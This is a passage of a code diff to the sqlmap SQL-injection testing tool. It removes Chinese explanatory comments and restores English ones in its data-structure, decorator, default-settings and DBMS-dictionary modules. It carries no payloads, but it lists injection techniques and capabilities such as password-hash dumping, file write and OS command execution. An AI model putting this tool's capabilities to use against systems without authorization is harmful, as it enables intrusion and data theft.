        return self.__dict__

-    # 定义 __setstate__ 方法，用于支持反序列化
    def __setstate__(self, dict):
        self.__dict__ = dict

-    # 定义 __deepcopy__ 方法，用于深拷贝
    def __deepcopy__(self, memo):
-        retVal = self.__class__() # 创建一个新实例
-        memo[id(self)] = retVal # 将新实例添加到 memo 中
+        retVal = self.__class__()
+        memo[id(self)] = retVal

-        for attr in dir(self): # 遍历所有属性
-            if not attr.startswith('_'): # 忽略私有属性
-                value = getattr(self, attr) # 获取属性值
-                if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)): # 忽略内置函数、函数和方法
-                    setattr(retVal, attr, copy.deepcopy(value, memo)) # 深拷贝属性值
+        for attr in dir(self):
+            if not attr.startswith('_'):
+                value = getattr(self, attr)
+                if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
+                    setattr(retVal, attr, copy.deepcopy(value, memo))

-        for key, value in self.items(): # 遍历所有字典项
-            retVal.__setitem__(key, copy.deepcopy(value, memo)) # 深拷贝字典项
+        for key, value in self.items():
+            retVal.__setitem__(key, copy.deepcopy(value, memo))

-        return retVal # 返回深拷贝后的实例
+        return retVal

-# 定义 InjectionDict 类，继承自 AttribDict，用于存储注入相关信息
 class InjectionDict(AttribDict):
    def __init__(self):
-        AttribDict.__init__(self) # 调用 AttribDict 的初始化方法
-
-        # 初始化注入信息
-        self.place = None # 注入位置
-        self.parameter = None # 注入参数
-        self.ptype = None # 参数类型
-        self.prefix = None # 前缀
-        self.suffix = None # 后缀
-        self.clause = None # 子句
-        self.notes = []  # 备注列表
-
-        # data 字典存储不同类型的注入数据
+        AttribDict.__init__(self)
+
+        self.place = None
+        self.parameter = None
+        self.ptype = None
+        self.prefix = None
+        self.suffix = None
+        self.clause = None
+        self.notes = []  # Note: https://github.com/sqlmapproject/sqlmap/issues/1888
+
+        # data is a dict with various stype, each which is a dict with
+        # all the information specific for that stype
        self.data = AttribDict()

-        # conf 字典存储检测期间使用的重要选项的快照
+        # conf is a dict which stores current snapshot of important
+        # options used during detection
        self.conf = AttribDict()

-        self.dbms = None # 数据库类型
-        self.dbms_version = None # 数据库版本
-        self.os = None # 操作系统
+        self.dbms = None
+        self.dbms_version = None
+        self.os = None

-# 定义 LRUDict 类，实现 LRU 缓存字典
-# 参考：https://www.kunxi.org/2014/05/lru-cache-in-python
+# Reference: https://www.kunxi.org/2014/05/lru-cache-in-python
 class LRUDict(object):
    """
    This class defines the LRU dictionary
@ -149,41 +141,40 @@ class LRUDict(object):
    """

    def __init__(self, capacity):
-        self.capacity = capacity # 设置缓存容量
-        self.cache = OrderedDict() # 使用 OrderedDict 作为缓存
-        self.__lock = threading.Lock() # 创建一个锁，用于线程同步
+        self.capacity = capacity
+        self.cache = OrderedDict()
+        self.__lock = threading.Lock()

    def __len__(self):
-        return len(self.cache) # 返回缓存长度
+        return len(self.cache)

    def __contains__(self, key):
-        return key in self.cache # 判断键是否存在于缓存中
+        return key in self.cache

    def __getitem__(self, key):
-        value = self.cache.pop(key) # 将键从缓存中移除
-        self.cache[key] = value # 将键添加回缓存，移动到最后
-        return value # 返回键的值
+        value = self.cache.pop(key)
+        self.cache[key] = value
+        return value

    def get(self, key):
-        return self.__getitem__(key) # 获取键的值
+        return self.__getitem__(key)

    def __setitem__(self, key, value):
-        with self.__lock: # 获取锁，保证线程安全
+        with self.__lock:
            try:
-                self.cache.pop(key) # 尝试从缓存中删除键
-            except KeyError: # 如果键不存在
-                if len(self.cache) >= self.capacity: # 如果缓存已满
-                    self.cache.popitem(last=False) # 删除最老的项
-        self.cache[key] = value # 将键值添加到缓存中
+                self.cache.pop(key)
+            except KeyError:
+                if len(self.cache) >= self.capacity:
+                    self.cache.popitem(last=False)
+        self.cache[key] = value

    def set(self, key, value):
-        self.__setitem__(key, value) # 设置键值
+        self.__setitem__(key, value)

    def keys(self):
-        return self.cache.keys() # 返回缓存的所有键
+        return self.cache.keys()

-# 定义 OrderedSet 类，实现有序集合
-# 参考：https://code.activestate.com/recipes/576694/
+# Reference: https://code.activestate.com/recipes/576694/
 class OrderedSet(_collections.MutableSet):
    """
    This class defines the set with ordered (as added) items
@ -201,57 +192,57 @@ class OrderedSet(_collections.MutableSet):
    """

    def __init__(self, iterable=None):
-        self.end = end = [] # 创建哨兵节点
-        end += [None, end, end]         # 双向链表的哨兵节点
-        self.map = {}                   # 存储键值和链表节点的映射
+        self.end = end = []
+        end += [None, end, end]         # sentinel node for doubly linked list
+        self.map = {}                   # key --> [key, prev, next]
        if iterable is not None:
-            self |= iterable # 添加可迭代对象
+            self |= iterable

    def __len__(self):
-        return len(self.map) # 返回集合长度
+        return len(self.map)

    def __contains__(self, key):
-        return key in self.map # 判断键是否存在于集合中
+        return key in self.map

    def add(self, value):
-        if value not in self.map: # 如果值不在集合中
+        if value not in self.map:
            end = self.end
            curr = end[1]
-            curr[2] = end[1] = self.map[value] = [value, curr, end] # 添加新节点到链表尾部
+            curr[2] = end[1] = self.map[value] = [value, curr, end]

    def discard(self, value):
-        if value in self.map: # 如果值在集合中
-            value, prev, next = self.map.pop(value) # 移除节点
-            prev[2] = next # 更新链表
+        if value in self.map:
+            value, prev, next = self.map.pop(value)
+            prev[2] = next
            next[1] = prev

    def __iter__(self):
        end = self.end
-        curr = end[2] # 从链表头开始遍历
+        curr = end[2]
        while curr is not end:
            yield curr[0]
-            curr = curr[2] # 移动到下一个节点
+            curr = curr[2]

    def __reversed__(self):
        end = self.end
-        curr = end[1] # 从链表尾开始遍历
+        curr = end[1]
        while curr is not end:
            yield curr[0]
-            curr = curr[1] # 移动到上一个节点
+            curr = curr[1]

    def pop(self, last=True):
-        if not self: # 如果集合为空
+        if not self:
            raise KeyError('set is empty')
-        key = self.end[1][0] if last else self.end[2][0] # 获取最后一个或第一个元素
-        self.discard(key) # 移除元素
-        return key # 返回元素值
+        key = self.end[1][0] if last else self.end[2][0]
+        self.discard(key)
+        return key

    def __repr__(self):
-        if not self: # 如果集合为空
+        if not self:
            return '%s()' % (self.__class__.__name__,)
-        return '%s(%r)' % (self.__class__.__name__, list(self)) # 返回字符串表示
+        return '%s(%r)' % (self.__class__.__name__, list(self))

    def __eq__(self, other):
-        if isinstance(other, OrderedSet): # 如果另一个对象是有序集合
-            return len(self) == len(other) and list(self) == list(other) # 比较长度和内容
-        return set(self) == set(other) # 比较集合内容
+        if isinstance(other, OrderedSet):
+            return len(self) == len(other) and list(self) == list(other)
+        return set(self) == set(other)
--- a/src/sqlmap-master/lib/core/decorators.py
+++ b/src/sqlmap-master/lib/core/decorators.py
@ -0,0 +1,100 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import functools
+import hashlib
+import threading
+
+from lib.core.datatype import LRUDict
+from lib.core.settings import MAX_CACHE_ITEMS
+from lib.core.settings import UNICODE_ENCODING
+from lib.core.threads import getCurrentThreadData
+
+_cache = {}
+_cache_lock = threading.Lock()
+_method_locks = {}
+
+def cachedmethod(f):
+    """
+    Method with a cached content
+
+    >>> __ = cachedmethod(lambda _: _)
+    >>> __(1)
+    1
+    >>> __(1)
+    1
+    >>> __ = cachedmethod(lambda *args, **kwargs: args[0])
+    >>> __(2)
+    2
+    >>> __ = cachedmethod(lambda *args, **kwargs: next(iter(kwargs.values())))
+    >>> __(foobar=3)
+    3
+
+    Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
+    """
+
+    _cache[f] = LRUDict(capacity=MAX_CACHE_ITEMS)
+
+    @functools.wraps(f)
+    def _f(*args, **kwargs):
+        try:
+            key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs)).encode(UNICODE_ENCODING)).hexdigest(), 16) & 0x7fffffffffffffff
+        except ValueError:  # https://github.com/sqlmapproject/sqlmap/issues/4281 (NOTE: non-standard Python behavior where hexdigest returns binary value)
+            result = f(*args, **kwargs)
+        else:
+            try:
+                with _cache_lock:
+                    result = _cache[f][key]
+            except KeyError:
+                result = f(*args, **kwargs)
+
+                with _cache_lock:
+                    _cache[f][key] = result
+
+        return result
+
+    return _f
+
+def stackedmethod(f):
+    """
+    Method using pushValue/popValue functions (fallback function for stack realignment)
+
+    >>> threadData = getCurrentThreadData()
+    >>> original = len(threadData.valueStack)
+    >>> __ = stackedmethod(lambda _: threadData.valueStack.append(_))
+    >>> __(1)
+    >>> len(threadData.valueStack) == original
+    True
+    """
+
+    @functools.wraps(f)
+    def _(*args, **kwargs):
+        threadData = getCurrentThreadData()
+        originalLevel = len(threadData.valueStack)
+
+        try:
+            result = f(*args, **kwargs)
+        finally:
+            if len(threadData.valueStack) > originalLevel:
+                threadData.valueStack = threadData.valueStack[:originalLevel]
+
+        return result
+
+    return _
+
+def lockedmethod(f):
+    @functools.wraps(f)
+    def _(*args, **kwargs):
+        if f not in _method_locks:
+            _method_locks[f] = threading.RLock()
+
+        with _method_locks[f]:
+            result = f(*args, **kwargs)
+
+        return result
+
+    return _
--- a/src/sqlmap-master/lib/core/defaults.py
+++ b/src/sqlmap-master/lib/core/defaults.py
@ -5,28 +5,25 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 从lib.core.datatype模块导入AttribDict类
 from lib.core.datatype import AttribDict

-# 定义默认配置字典
 _defaults = {
-    "csvDel": ',',          # CSV文件的分隔符
-    "timeSec": 5,           # 延迟时间(秒)
-    "googlePage": 1,        # Google搜索的起始页码
-    "verbose": 1,           # 详细程度(1-6,数字越大输出信息越详细)
-    "delay": 0,             # 每次请求之间的延迟时间
-    "timeout": 30,          # 请求超时时间(秒)
-    "retries": 3,           # 请求失败后的重试次数
-    "csrfRetries": 0,       # CSRF令牌请求的重试次数
-    "safeFreq": 0,          # 安全频率检查的时间间隔
-    "threads": 1,           # 并发线程数
-    "level": 1,             # 测试等级(1-5,数字越大测试越深入)
-    "risk": 1,              # 风险等级(1-3,数字越大风险越高)
-    "dumpFormat": "CSV",    # 导出数据的格式
-    "tablePrefix": "sqlmap", # 临时表名前缀
-    "technique": "BEUSTQ",   # SQL注入技术(B:布尔盲注,E:报错注入,U:联合查询注入,S:堆叠注入,T:时间盲注,Q:内联查询)
-    "torType": "SOCKS5",    # Tor代理类型
+    "csvDel": ',',
+    "timeSec": 5,
+    "googlePage": 1,
+    "verbose": 1,
+    "delay": 0,
+    "timeout": 30,
+    "retries": 3,
+    "csrfRetries": 0,
+    "safeFreq": 0,
+    "threads": 1,
+    "level": 1,
+    "risk": 1,
+    "dumpFormat": "CSV",
+    "tablePrefix": "sqlmap",
+    "technique": "BEUSTQ",
+    "torType": "SOCKS5",
 }

-# 将默认配置字典转换为AttribDict对象,方便通过属性方式访问
 defaults = AttribDict(_defaults)
--- a/src/sqlmap-master/lib/core/dicts.py
+++ b/src/sqlmap-master/lib/core/dicts.py
@ -5,13 +5,10 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的枚举类型
 from lib.core.enums import CONTENT_TYPE
 from lib.core.enums import DBMS
 from lib.core.enums import OS
 from lib.core.enums import POST_HINT
-
-# 导入各种数据库别名和设置
 from lib.core.settings import ACCESS_ALIASES
 from lib.core.settings import ALTIBASE_ALIASES
 from lib.core.settings import BLANK
@ -43,192 +40,187 @@ from lib.core.settings import VERTICA_ALIASES
 from lib.core.settings import VIRTUOSO_ALIASES
 from lib.core.settings import CLICKHOUSE_ALIASES

-# Firebird数据库的数据类型映射字典
 FIREBIRD_TYPES = {
-    261: "BLOB",        # 二进制大对象
-    14: "CHAR",         # 定长字符串
-    40: "CSTRING",      # C风格字符串
-    11: "D_FLOAT",      # 双精度浮点数
-    27: "DOUBLE",       # 双精度数
-    10: "FLOAT",        # 浮点数
-    16: "INT64",        # 64位整数
-    8: "INTEGER",       # 整数
-    9: "QUAD",          # 四字节整数
-    7: "SMALLINT",      # 小整数
-    12: "DATE",         # 日期
-    13: "TIME",         # 时间
-    35: "TIMESTAMP",    # 时间戳
-    37: "VARCHAR",      # 变长字符串
+    261: "BLOB",
+    14: "CHAR",
+    40: "CSTRING",
+    11: "D_FLOAT",
+    27: "DOUBLE",
+    10: "FLOAT",
+    16: "INT64",
+    8: "INTEGER",
+    9: "QUAD",
+    7: "SMALLINT",
+    12: "DATE",
+    13: "TIME",
+    35: "TIMESTAMP",
+    37: "VARCHAR",
 }

-# Informix数据库的数据类型映射字典
 INFORMIX_TYPES = {
-    0: "CHAR",          # 定长字符串
-    1: "SMALLINT",      # 小整数
-    2: "INTEGER",       # 整数
-    3: "FLOAT",         # 浮点数
-    4: "SMALLFLOAT",    # 小浮点数
-    5: "DECIMAL",       # 十进制数
-    6: "SERIAL",        # 序列号
-    7: "DATE",          # 日期
-    8: "MONEY",         # 货币类型
-    9: "NULL",          # 空值
-    10: "DATETIME",     # 日期时间
-    11: "BYTE",         # 字节
-    12: "TEXT",         # 文本
-    13: "VARCHAR",      # 变长字符串
-    14: "INTERVAL",     # 时间间隔
-    15: "NCHAR",        # Unicode字符
-    16: "NVARCHAR",     # Unicode变长字符
-    17: "INT8",         # 8字节整数
-    18: "SERIAL8",      # 8字节序列号
-    19: "SET",          # 集合
-    20: "MULTISET",     # 多重集
-    21: "LIST",         # 列表
-    22: "ROW (unnamed)", # 未命名行
-    23: "COLLECTION",   # 集合
-    40: "Variable-length opaque type", # 变长不透明类型
-    41: "Fixed-length opaque type",    # 定长不透明类型
-    43: "LVARCHAR",     # 长变长字符串
-    45: "BOOLEAN",      # 布尔值
-    52: "BIGINT",       # 大整数
-    53: "BIGSERIAL",    # 大序列号
-    2061: "IDSSECURITYLABEL", # 安全标签
-    4118: "ROW (named)", # 命名行
+    0: "CHAR",
+    1: "SMALLINT",
+    2: "INTEGER",
+    3: "FLOAT",
+    4: "SMALLFLOAT",
+    5: "DECIMAL",
+    6: "SERIAL",
+    7: "DATE",
+    8: "MONEY",
+    9: "NULL",
+    10: "DATETIME",
+    11: "BYTE",
+    12: "TEXT",
+    13: "VARCHAR",
+    14: "INTERVAL",
+    15: "NCHAR",
+    16: "NVARCHAR",
+    17: "INT8",
+    18: "SERIAL8",
+    19: "SET",
+    20: "MULTISET",
+    21: "LIST",
+    22: "ROW (unnamed)",
+    23: "COLLECTION",
+    40: "Variable-length opaque type",
+    41: "Fixed-length opaque type",
+    43: "LVARCHAR",
+    45: "BOOLEAN",
+    52: "BIGINT",
+    53: "BIGSERIAL",
+    2061: "IDSSECURITYLABEL",
+    4118: "ROW (named)",
 }

-# Sybase数据库的数据类型映射字典
 SYBASE_TYPES = {
-    14: "floatn",       # 可空浮点数
-    8: "float",         # 浮点数
-    15: "datetimn",     # 可空日期时间
-    12: "datetime",     # 日期时间
-    23: "real",         # 实数
-    28: "numericn",     # 可空数值
-    10: "numeric",      # 数值
-    27: "decimaln",     # 可空十进制数
-    26: "decimal",      # 十进制数
-    17: "moneyn",       # 可空货币
-    11: "money",        # 货币
-    21: "smallmoney",   # 小额货币
-    22: "smalldatetime", # 小日期时间
-    13: "intn",         # 可空整数
-    7: "int",           # 整数
-    6: "smallint",      # 小整数
-    5: "tinyint",       # 微整数
-    16: "bit",          # 位
-    2: "varchar",       # 变长字符串
-    18: "sysname",      # 系统名称
-    25: "nvarchar",     # Unicode变长字符
-    1: "char",          # 定长字符串
-    24: "nchar",        # Unicode字符
-    4: "varbinary",     # 变长二进制
-    80: "timestamp",    # 时间戳
-    3: "binary",        # 二进制
-    19: "text",         # 文本
-    20: "image",        # 图像
+    14: "floatn",
+    8: "float",
+    15: "datetimn",
+    12: "datetime",
+    23: "real",
+    28: "numericn",
+    10: "numeric",
+    27: "decimaln",
+    26: "decimal",
+    17: "moneyn",
+    11: "money",
+    21: "smallmoney",
+    22: "smalldatetime",
+    13: "intn",
+    7: "int",
+    6: "smallint",
+    5: "tinyint",
+    16: "bit",
+    2: "varchar",
+    18: "sysname",
+    25: "nvarchar",
+    1: "char",
+    24: "nchar",
+    4: "varbinary",
+    80: "timestamp",
+    3: "binary",
+    19: "text",
+    20: "image",
 }

-# Altibase数据库的数据类型映射字典
 ALTIBASE_TYPES = {
-    1: "CHAR",          # 定长字符串
-    12: "VARCHAR",      # 变长字符串
-    -8: "NCHAR",        # Unicode字符
-    -9: "NVARCHAR",     # Unicode变长字符
-    2: "NUMERIC",       # 数值
-    6: "FLOAT",         # 浮点数
-    8: "DOUBLE",        # 双精度数
-    7: "REAL",          # 实数
-    -5: "BIGINT",       # 大整数
-    4: "INTEGER",       # 整数
-    5: "SMALLINT",      # 小整数
-    9: "DATE",          # 日期
-    30: "BLOB",         # 二进制大对象
-    40: "CLOB",         # 字符大对象
-    20001: "BYTE",      # 字节
-    20002: "NIBBLE",    # 半字节
-    -7: "BIT",          # 位
-    -100: "VARBIT",     # 变长位串
-    10003: "GEOMETRY",  # 几何数据
+    1: "CHAR",
+    12: "VARCHAR",
+    -8: "NCHAR",
+    -9: "NVARCHAR",
+    2: "NUMERIC",
+    6: "FLOAT",
+    8: "DOUBLE",
+    7: "REAL",
+    -5: "BIGINT",
+    4: "INTEGER",
+    5: "SMALLINT",
+    9: "DATE",
+    30: "BLOB",
+    40: "CLOB",
+    20001: "BYTE",
+    20002: "NIBBLE",
+    -7: "BIT",
+    -100: "VARBIT",
+    10003: "GEOMETRY",
 }

-# MySQL数据库的权限映射字典
 MYSQL_PRIVS = {
-    1: "select_priv",   # 查询权限
-    2: "insert_priv",   # 插入权限
-    3: "update_priv",   # 更新权限
-    4: "delete_priv",   # 删除权限
-    5: "create_priv",   # 创建权限
-    6: "drop_priv",     # 删除权限
-    7: "reload_priv",   # 重载权限
-    8: "shutdown_priv", # 关闭权限
-    9: "process_priv",  # 进程权限
-    10: "file_priv",    # 文件权限
-    11: "grant_priv",   # 授权权限
-    12: "references_priv", # 引用权限
-    13: "index_priv",   # 索引权限
-    14: "alter_priv",   # 修改权限
-    15: "show_db_priv", # 显示数据库权限
-    16: "super_priv",   # 超级权限
-    17: "create_tmp_table_priv", # 创建临时表权限
-    18: "lock_tables_priv", # 锁表权限
-    19: "execute_priv", # 执行权限
-    20: "repl_slave_priv", # 复制从权限
-    21: "repl_client_priv", # 复制客户端权限
-    22: "create_view_priv", # 创建视图权限
-    23: "show_view_priv", # 显示视图权限
-    24: "create_routine_priv", # 创建例程权限
-    25: "alter_routine_priv", # 修改例程权限
-    26: "create_user_priv", # 创建用户权限
+    1: "select_priv",
+    2: "insert_priv",
+    3: "update_priv",
+    4: "delete_priv",
+    5: "create_priv",
+    6: "drop_priv",
+    7: "reload_priv",
+    8: "shutdown_priv",
+    9: "process_priv",
+    10: "file_priv",
+    11: "grant_priv",
+    12: "references_priv",
+    13: "index_priv",
+    14: "alter_priv",
+    15: "show_db_priv",
+    16: "super_priv",
+    17: "create_tmp_table_priv",
+    18: "lock_tables_priv",
+    19: "execute_priv",
+    20: "repl_slave_priv",
+    21: "repl_client_priv",
+    22: "create_view_priv",
+    23: "show_view_priv",
+    24: "create_routine_priv",
+    25: "alter_routine_priv",
+    26: "create_user_priv",
 }

-# PostgreSQL数据库的权限映射字典
 PGSQL_PRIVS = {
-    1: "createdb",      # 创建数据库权限
-    2: "super",         # 超级用户权限
-    3: "catupd",        # 更新系统目录权限
+    1: "createdb",
+    2: "super",
+    3: "catupd",
 }

-# Firebird数据库的权限映射字典
+# Reference(s): http://stackoverflow.com/a/17672504
+#               http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES
+
 FIREBIRD_PRIVS = {
-    "S": "SELECT",      # 查询权限
-    "I": "INSERT",      # 插入权限
-    "U": "UPDATE",      # 更新权限
-    "D": "DELETE",      # 删除权限
-    "R": "REFERENCE",   # 引用权限
-    "X": "EXECUTE",     # 执行权限
-    "A": "ALL",         # 所有权限
-    "M": "MEMBER",      # 成员权限
-    "T": "DECRYPT",     # 解密权限
-    "E": "ENCRYPT",     # 加密权限
-    "B": "SUBSCRIBE",   # 订阅权限
+    "S": "SELECT",
+    "I": "INSERT",
+    "U": "UPDATE",
+    "D": "DELETE",
+    "R": "REFERENCE",
+    "X": "EXECUTE",
+    "A": "ALL",
+    "M": "MEMBER",
+    "T": "DECRYPT",
+    "E": "ENCRYPT",
+    "B": "SUBSCRIBE",
 }

-# Informix数据库的权限映射字典
+# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm
+#               https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm
+
 INFORMIX_PRIVS = {
-    "D": "DBA (all privileges)", # 数据库管理员(所有权限)
-    "R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)", # 资源权限(创建用户定义例程、类型、永久表和索引)
-    "C": "CONNECT (work with existing tables)", # 连接权限(使用现有表)
-    "G": "ROLE",        # 角色
-    "U": "DEFAULT (implicit connection)", # 默认权限(隐式连接)
+    "D": "DBA (all privileges)",
+    "R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)",
+    "C": "CONNECT (work with existing tables)",
+    "G": "ROLE",
+    "U": "DEFAULT (implicit connection)",
 }

-# DB2数据库的权限映射字典
 DB2_PRIVS = {
-    1: "CONTROLAUTH",   # 控制权限
-    2: "ALTERAUTH",     # 修改权限
-    3: "DELETEAUTH",    # 删除权限
-    4: "INDEXAUTH",     # 索引权限
-    5: "INSERTAUTH",    # 插入权限
-    6: "REFAUTH",       # 引用权限
-    7: "SELECTAUTH",    # 查询权限
-    8: "UPDATEAUTH",    # 更新权限
+    1: "CONTROLAUTH",
+    2: "ALTERAUTH",
+    3: "DELETEAUTH",
+    4: "INDEXAUTH",
+    5: "INSERTAUTH",
+    6: "REFAUTH",
+    7: "SELECTAUTH",
+    8: "UPDATEAUTH",
 }

-# 转储数据时的替换规则
 DUMP_REPLACEMENTS = {" ": NULL, "": BLANK}

-# 数据库管理系统(DBMS)字典,包含每个数据库系统的别名、Python驱动、项目URL和SQLAlchemy方言
 DBMS_DICT = {
    DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"),
    DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/PyMySQL/PyMySQL", "mysql"),
@ -260,7 +252,7 @@ DBMS_DICT = {
    DBMS.VIRTUOSO: (VIRTUOSO_ALIASES, None, None, None),
 }

-# 不同数据库系统的虚拟表(用于在没有实际表时执行查询)
+# Reference: https://blog.jooq.org/tag/sysibm-sysdummy1/
 FROM_DUMMY_TABLE = {
    DBMS.ORACLE: " FROM DUAL",
    DBMS.ACCESS: " FROM MSysAccessObjects",
@ -274,7 +266,6 @@ FROM_DUMMY_TABLE = {
    DBMS.FRONTBASE: " FROM INFORMATION_SCHEMA.IO_STATISTICS"
 }

-# 不同数据库系统的NULL值评估函数
 HEURISTIC_NULL_EVAL = {
    DBMS.ACCESS: "CVAR(NULL)",
    DBMS.MAXDB: "ALPHA(NULL)",
@ -291,7 +282,7 @@ HEURISTIC_NULL_EVAL = {
    DBMS.PRESTO: "FROM_HEX(NULL)",
    DBMS.ALTIBASE: "TDESENCRYPT(NULL,NULL)",
    DBMS.MIMERSQL: "ASCII_CHAR(256)",
-    DBMS.CRATEDB: "MD5(NULL~NULL)",  # 注意: NULL~NULL也在H2和Ignite上进行评估
+    DBMS.CRATEDB: "MD5(NULL~NULL)",  # Note: NULL~NULL also being evaluated on H2 and Ignite
    DBMS.CUBRID: "(NULL SETEQ NULL)",
    DBMS.CACHE: "%SQLUPPER NULL",
    DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))",
@ -300,9 +291,8 @@ HEURISTIC_NULL_EVAL = {
    DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL",
 }

-# SQL语句类型分类
 SQL_STATEMENTS = {
-    "SQL SELECT statement": (  # SQL查询语句
+    "SQL SELECT statement": (
        "select ",
        "show ",
        " top ",
@ -320,7 +310,7 @@ SQL_STATEMENTS = {
        "(case ",
    ),

-    "SQL data definition": (  # SQL数据定义语句
+    "SQL data definition": (
        "create ",
        "declare ",
        "drop ",
@ -328,7 +318,7 @@ SQL_STATEMENTS = {
        "alter ",
    ),

-    "SQL data manipulation": (  # SQL数据操作语句
+    "SQL data manipulation": (
        "bulk ",
        "insert ",
        "update ",
@ -337,19 +327,19 @@ SQL_STATEMENTS = {
        "load ",
    ),

-    "SQL data control": (  # SQL数据控制语句
+    "SQL data control": (
        "grant ",
        "revoke ",
    ),

-    "SQL data execution": (  # SQL数据执行语句
+    "SQL data execution": (
        "exec ",
        "execute ",
        "values ",
        "call ",
    ),

-    "SQL transaction": (  # SQL事务语句
+    "SQL transaction": (
        "start transaction ",
        "begin work ",
        "begin transaction ",
@ -357,12 +347,11 @@ SQL_STATEMENTS = {
        "rollback ",
    ),

-    "SQL administration": (  # SQL管理语句
+    "SQL administration": (
        "set ",
    ),
 }

-# POST请求提示的内容类型
 POST_HINT_CONTENT_TYPES = {
    POST_HINT.JSON: "application/json",
    POST_HINT.JSON_LIKE: "application/json",
@ -372,7 +361,6 @@ POST_HINT_CONTENT_TYPES = {
    POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
 }

-# 过时的选项及其替代建议
 OBSOLETE_OPTIONS = {
    "--replicate": "use '--dump-format=SQLITE' instead",
    "--no-unescape": "use '--no-escape' instead",
@ -388,63 +376,301 @@ OBSOLETE_OPTIONS = {
    "--identify-waf": "functionality being done automatically",
 }

-# 已弃用的选项
 DEPRECATED_OPTIONS = {
 }

-# 转储数据预处理规则
 DUMP_DATA_PREPROCESS = {
-    DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"},  # 参考: https://www.tibcommunity.com/docs/DOC-3643
+    DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"},  # Reference: https://www.tibcommunity.com/docs/DOC-3643
    DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"},
 }

-# 默认文档根目录
 DEFAULT_DOC_ROOTS = {
    OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
-    OS.LINUX: ("/var/www/", "/var/www/html", "/var/www/htdocs", "/usr/local/apache2/htdocs", "/usr/local/www/data", "/var/apache2/htdocs", "/var/www/nginx-default", "/srv/www/htdocs", "/usr/local/var/www")  # 参考: https://wiki.apache.org/httpd/DistrosDefaultLayout
+    OS.LINUX: ("/var/www/", "/var/www/html", "/var/www/htdocs", "/usr/local/apache2/htdocs", "/usr/local/www/data", "/var/apache2/htdocs", "/var/www/nginx-default", "/srv/www/htdocs", "/usr/local/var/www")  # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
 }

-# 部分运行内容类型
 PART_RUN_CONTENT_TYPES = {
-    "checkDbms": CONTENT_TYPE.TECHNIQUES,           # 检查数据库类型
-    "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT, # 获取数据库指纹
-    "getBanner": CONTENT_TYPE.BANNER,               # 获取横幅信息
-    "getCurrentUser": CONTENT_TYPE.CURRENT_USER,    # 获取当前用户
-    "getCurrentDb": CONTENT_TYPE.CURRENT_DB,        # 获取当前数据库
-    "getHostname": CONTENT_TYPE.HOSTNAME,           # 获取主机名
-    "isDba": CONTENT_TYPE.IS_DBA,                  # 是否为DBA
-    "getUsers": CONTENT_TYPE.USERS,                # 获取用户列表
-    "getPasswordHashes": CONTENT_TYPE.PASSWORDS,    # 获取密码哈希
-    "getPrivileges": CONTENT_TYPE.PRIVILEGES,      # 获取权限
-    "getRoles": CONTENT_TYPE.ROLES,                # 获取角色
-    "getDbs": CONTENT_TYPE.DBS,                    # 获取数据库列表
-    "getTables": CONTENT_TYPE.TABLES,              # 获取表列表
-    "getColumns": CONTENT_TYPE.COLUMNS,            # 获取列列表
-    "getSchema": CONTENT_TYPE.SCHEMA,              # 获取架构
-    "getCount": CONTENT_TYPE.COUNT,                # 获取计数
-    "dumpTable": CONTENT_TYPE.DUMP_TABLE,          # 转储表
-    "search": CONTENT_TYPE.SEARCH,                 # 搜索
-    "sqlQuery": CONTENT_TYPE.SQL_QUERY,            # SQL查询
-    "tableExists": CONTENT_TYPE.COMMON_TABLES,     # 表是否存在
-    "columnExists": CONTENT_TYPE.COMMON_COLUMNS,   # 列是否存在
-    "readFile": CONTENT_TYPE.FILE_READ,            # 读取文件
-    "writeFile": CONTENT_TYPE.FILE_WRITE,          # 写入文件
-    "osCmd": CONTENT_TYPE.OS_CMD,                  # 操作系统命令
-    "regRead": CONTENT_TYPE.REG_READ               # 注册表读取
+    "checkDbms": CONTENT_TYPE.TECHNIQUES,
+    "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
+    "getBanner": CONTENT_TYPE.BANNER,
+    "getCurrentUser": CONTENT_TYPE.CURRENT_USER,
+    "getCurrentDb": CONTENT_TYPE.CURRENT_DB,
+    "getHostname": CONTENT_TYPE.HOSTNAME,
+    "isDba": CONTENT_TYPE.IS_DBA,
+    "getUsers": CONTENT_TYPE.USERS,
+    "getPasswordHashes": CONTENT_TYPE.PASSWORDS,
+    "getPrivileges": CONTENT_TYPE.PRIVILEGES,
+    "getRoles": CONTENT_TYPE.ROLES,
+    "getDbs": CONTENT_TYPE.DBS,
+    "getTables": CONTENT_TYPE.TABLES,
+    "getColumns": CONTENT_TYPE.COLUMNS,
+    "getSchema": CONTENT_TYPE.SCHEMA,
+    "getCount": CONTENT_TYPE.COUNT,
+    "dumpTable": CONTENT_TYPE.DUMP_TABLE,
+    "search": CONTENT_TYPE.SEARCH,
